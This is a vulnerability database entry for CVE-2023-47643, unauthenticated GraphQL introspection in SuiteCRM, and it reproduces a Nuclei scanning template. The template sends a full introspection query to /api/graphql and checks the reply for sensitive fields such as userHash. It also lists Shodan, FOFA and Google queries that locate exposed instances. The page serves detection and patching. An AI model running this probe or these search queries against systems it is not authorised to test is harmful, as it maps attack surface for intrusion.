SuiteCRM Unauthenticated Graphql Introspection

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType

SuiteCRM Unauthenticated Graphql Introspection exposes schema. Update to v8.4.

Reporter	Title	Published	Views	Family All 11
CNNVD	SalesAgility SuiteCRM Security Breach	21 Nov 202300:00	–	cnnvd
CVE	CVE-2023-47643	21 Nov 202319:32	–	cve
Cvelist	CVE-2023-47643 SuiteCRM has Unauthenticated Graphql Introspection Enabled	21 Nov 202319:32	–	cvelist
NVD	CVE-2023-47643	21 Nov 202320:15	–	nvd
OSV	BIT-SUITECRM-2023-47643 SuiteCRM has Unauthenticated Graphql Introspection Enabled	6 Mar 202411:07	–	osv
OSV	CVE-2023-47643 SuiteCRM has Unauthenticated Graphql Introspection Enabled	21 Nov 202319:32	–	osv
Prion	Authentication flaw	21 Nov 202320:15	–	prion
Positive Technologies	PT-2023-30531 · Suitecrm · Suitecrm	21 Nov 202300:00	–	ptsecurity
RedhatCVE	CVE-2023-47643	23 May 202504:11	–	redhatcve
VulnCheck KEV	VulnCheck KEV: CVE-2023-47643	24 Dec 202400:00	–	vulncheck_kev

Source	Link
github	www.github.com/salesagility/SuiteCRM-Core/security/advisories/GHSA-fxww-jqfv-9rrr
nvd	www.nvd.nist.gov/vuln/detail/CVE-2023-47643
apollographql	www.apollographql.com/blog/graphql/security/why-you-should-disable-graphql-introspection-in-production/

id: CVE-2023-47643

info:
  name: SuiteCRM Unauthenticated Graphql Introspection
  author: isacaya
  severity: medium
  description: |
    Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.
  impact: |
    An attacker can obtain the GraphQL schema and understand the entire attack surface of the API, including sensitive fields such as UserHash.
  remediation: |
    Update to version 8.4.2.
  reference:
    - https://github.com/salesagility/SuiteCRM-Core/security/advisories/GHSA-fxww-jqfv-9rrr
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47643
    - https://www.apollographql.com/blog/graphql/security/why-you-should-disable-graphql-introspection-in-production/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-47643
    cwe-id: CWE-200
    epss-score: 0.03002
    epss-percentile: 0.85688
    cpe: cpe:2.3:a:salesagility:suitecrm:8.4.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: salesagility
    product: suitecrm
    shodan-query:
      - title:"SuiteCRM"
      - http.title:"suitecrm"
    fofa-query: title="suitecrm"
    google-query: intitle:"suitecrm"
  tags: cve,cve2023,graphql,suitecrm,introspection,salesagility,vkev,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /api/graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-XSRF-TOKEN: {{csrftoken}}

        {"query":"query IntrospectionQuery {\r\n      __schema {\r\n        \r\n        queryType { name }\r\n        mutationType { name }\r\n        subscriptionType { name }\r\n        types {\r\n          ...FullType\r\n        }\r\n        directives {\r\n          name\r\n          description\r\n          \r\n          locations\r\n          args {\r\n            ...InputValue\r\n          }\r\n        }\r\n      }\r\n    }\r\n\r\n    fragment FullType on __Type {\r\n      kind\r\n      name\r\n      description\r\n      \r\n      fields(includeDeprecated: true) {\r\n        name\r\n        description\r\n        args {\r\n          ...InputValue\r\n        }\r\n        type {\r\n          ...TypeRef\r\n        }\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      inputFields {\r\n        ...InputValue\r\n      }\r\n      interfaces {\r\n        ...TypeRef\r\n      }\r\n      enumValues(includeDeprecated: true) {\r\n        name\r\n        description\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      possibleTypes {\r\n        ...TypeRef\r\n      }\r\n    }\r\n\r\n    fragment InputValue on __InputValue {\r\n      name\r\n      description\r\n      type { ...TypeRef }\r\n      defaultValue\r\n      \r\n      \r\n    }\r\n\r\n    fragment TypeRef on __Type {\r\n      kind\r\n      name\r\n      ofType {\r\n        kind\r\n        name\r\n        ofType {\r\n          kind\r\n          name\r\n          ofType {\r\n            kind\r\n            name\r\n            ofType {\r\n              kind\r\n              name\r\n              ofType {\r\n                kind\r\n                name\r\n                ofType {\r\n                  kind\r\n                  name\r\n                  ofType {\r\n                    kind\r\n                    name\r\n                  }\r\n                }\r\n              }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "userHash"
          - "authenticateId"
          - "systemGeneratedPassword"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrftoken
        group: 1
        part: header
        regex:
          - "XSRF-TOKEN=([^;]+)"
        internal: true
# digest: 4b0a00483046022100c245b2b6324f2483cf9494d6f9028e7e2376b6498b1d8fc6c1c8a872ac543d7b022100e45cd0c28e77a4596ee859cad154c2f01623daac94d0006bb96a6b1186a381e5:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6Medium risk

Vulners AI Score6

CVSS 3.13.1 - 5.3

EPSS0.03002

SSVC